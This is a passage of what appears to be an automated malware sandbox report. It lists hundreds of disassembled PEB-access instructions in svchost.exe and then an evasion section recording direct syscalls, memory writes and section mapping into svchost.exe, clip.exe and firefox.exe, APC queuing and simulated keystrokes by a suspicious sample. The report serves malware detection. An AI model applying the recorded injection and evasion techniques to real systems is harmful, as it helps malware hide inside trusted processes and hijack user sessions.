            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034364AB mov eax, dword ptr fs:[00000030h]6_2_034364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034644B0 mov ecx, dword ptr fs:[00000030h]6_2_034644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BA4B0 mov eax, dword ptr fs:[00000030h]6_2_034BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E4B4B mov eax, dword ptr fs:[00000030h]6_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E4B4B mov eax, dword ptr fs:[00000030h]6_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03502B57 mov eax, dword ptr fs:[00000030h]6_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03502B57 mov eax, dword ptr fs:[00000030h]6_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03502B57 mov eax, dword ptr fs:[00000030h]6_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03502B57 mov eax, dword ptr fs:[00000030h]6_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C6B40 mov eax, dword ptr fs:[00000030h]6_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C6B40 mov eax, dword ptr fs:[00000030h]6_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FAB40 mov eax, dword ptr fs:[00000030h]6_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D8B42 mov eax, dword ptr fs:[00000030h]6_2_034D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03428B50 mov eax, dword ptr fs:[00000030h]6_2_03428B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DEB50 mov eax, dword ptr fs:[00000030h]6_2_034DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342CB7E mov eax, dword ptr fs:[00000030h]6_2_0342CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504B00 mov eax, dword ptr fs:[00000030h]6_2_03504B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345EB20 mov eax, dword ptr fs:[00000030h]6_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345EB20 mov eax, dword ptr fs:[00000030h]6_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F8B28 mov eax, dword ptr fs:[00000030h]6_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F8B28 mov eax, dword ptr fs:[00000030h]6_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03450BCB mov eax, dword ptr fs:[00000030h]6_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03450BCB mov eax, dword ptr fs:[00000030h]6_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03450BCB mov eax, dword ptr fs:[00000030h]6_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03430BCD mov eax, dword ptr fs:[00000030h]6_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03430BCD mov eax, dword ptr fs:[00000030h]6_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03430BCD mov eax, dword ptr fs:[00000030h]6_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DEBD0 mov eax, dword ptr fs:[00000030h]6_2_034DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03438BF0 mov eax, dword ptr fs:[00000030h]6_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03438BF0 mov eax, dword ptr fs:[00000030h]6_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03438BF0 mov eax, dword ptr fs:[00000030h]6_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345EBFC mov eax, dword ptr fs:[00000030h]6_2_0345EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BCBF0 mov eax, dword ptr fs:[00000030h]6_2_034BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440BBE mov eax, dword ptr fs:[00000030h]6_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440BBE mov eax, dword ptr fs:[00000030h]6_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E4BB0 mov eax, dword ptr fs:[00000030h]6_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E4BB0 mov eax, dword ptr fs:[00000030h]6_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]6_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]6_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]6_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]6_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]6_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]6_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]6_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440A5B mov eax, dword ptr fs:[00000030h]6_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440A5B mov eax, dword ptr fs:[00000030h]6_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346CA6F mov eax, dword ptr fs:[00000030h]6_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346CA6F mov eax, dword ptr fs:[00000030h]6_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346CA6F mov eax, dword ptr fs:[00000030h]6_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DEA60 mov eax, dword ptr fs:[00000030h]6_2_034DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034ACA72 mov eax, dword ptr fs:[00000030h]6_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034ACA72 mov eax, dword ptr fs:[00000030h]6_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BCA11 mov eax, dword ptr fs:[00000030h]6_2_034BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346CA24 mov eax, dword ptr fs:[00000030h]6_2_0346CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345EA2E mov eax, dword ptr fs:[00000030h]6_2_0345EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03454A35 mov eax, dword ptr fs:[00000030h]6_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03454A35 mov eax, dword ptr fs:[00000030h]6_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346CA38 mov eax, dword ptr fs:[00000030h]6_2_0346CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03486ACC mov eax, dword ptr fs:[00000030h]6_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03486ACC mov eax, dword ptr fs:[00000030h]6_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03486ACC mov eax, dword ptr fs:[00000030h]6_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03430AD0 mov eax, dword ptr fs:[00000030h]6_2_03430AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03464AD0 mov eax, dword ptr fs:[00000030h]6_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03464AD0 mov eax, dword ptr fs:[00000030h]6_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346AAEE mov eax, dword ptr fs:[00000030h]6_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346AAEE mov eax, dword ptr fs:[00000030h]6_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504A80 mov eax, dword ptr fs:[00000030h]6_2_03504A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03468A90 mov edx, dword ptr fs:[00000030h]6_2_03468A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03438AA0 mov eax, dword ptr fs:[00000030h]6_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03438AA0 mov eax, dword ptr fs:[00000030h]6_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03486AA4 mov eax, dword ptr fs:[00000030h]6_2_03486AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B0946 mov eax, dword ptr fs:[00000030h]6_2_034B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504940 mov eax, dword ptr fs:[00000030h]6_2_03504940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03456962 mov eax, dword ptr fs:[00000030h]6_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03456962 mov eax, dword ptr fs:[00000030h]6_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03456962 mov eax, dword ptr fs:[00000030h]6_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0347096E mov eax, dword ptr fs:[00000030h]6_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0347096E mov edx, dword ptr fs:[00000030h]6_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0347096E mov eax, dword ptr fs:[00000030h]6_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D4978 mov eax, dword ptr fs:[00000030h]6_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D4978 mov eax, dword ptr fs:[00000030h]6_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BC97C mov eax, dword ptr fs:[00000030h]6_2_034BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE908 mov eax, dword ptr fs:[00000030h]6_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE908 mov eax, dword ptr fs:[00000030h]6_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BC912 mov eax, dword ptr fs:[00000030h]6_2_034BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03428918 mov eax, dword ptr fs:[00000030h]6_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03428918 mov eax, dword ptr fs:[00000030h]6_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B892A mov eax, dword ptr fs:[00000030h]6_2_034B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C892B mov eax, dword ptr fs:[00000030h]6_2_034C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C69C0 mov eax, dword ptr fs:[00000030h]6_2_034C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]6_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]6_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]6_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]6_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]6_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]6_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034649D0 mov eax, dword ptr fs:[00000030h]6_2_034649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FA9D3 mov eax, dword ptr fs:[00000030h]6_2_034FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BE9E0 mov eax, dword ptr fs:[00000030h]6_2_034BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034629F9 mov eax, dword ptr fs:[00000030h]6_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034629F9 mov eax, dword ptr fs:[00000030h]6_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_03442840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_03460854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_03434859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_03434859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_034BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_03452835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_03452835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E681F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E3A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E3A364 SetUnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtMapViewOfSection: Direct from: 0x77762D1C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtCreateMutant: Direct from: 0x777635CC
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtResumeThread: Direct from: 0x777636AC
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtProtectVirtualMemory: Direct from: 0x77757B2E
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtReadFile: Direct from: 0x77762ADC
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtDelayExecution: Direct from: 0x77762DDC
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtQueryInformationProcess: Direct from: 0x77762C26
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtResumeThread: Direct from: 0x77762FBC
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtCreateUserProcess: Direct from: 0x7776371C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtSetInformationThread: Direct from: 0x777563F9
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtOpenKeyEx: Direct from: 0x77763C9C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtSetInformationThread: Direct from: 0x77762B4C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtCreateKey: Direct from: 0x77762C6C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtQuerySystemInformation: Direct from: 0x777648CC
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtOpenSection: Direct from: 0x77762E0C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtQueryValueKey: Direct from: 0x77762BEC
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtQueryInformationToken: Direct from: 0x77762CAC
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtTerminateThread: Direct from: 0x77762FCC
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtCreateFile: Direct from: 0x77762FEC
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtOpenFile: Direct from: 0x77762DCC
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtOpenKeyEx: Direct from: 0x77762B9C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtSetInformationProcess: Direct from: 0x77762C5C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe protection: read write
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe | Thread register set: target process: 7548
            Source: C:\Windows\SysWOW64\clip.exe | Thread APC queued: target process: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2842008
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E68C93 LogonUserW
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E13B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E14A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exe | Code function: 4_2_00E74EF5 mouse_event
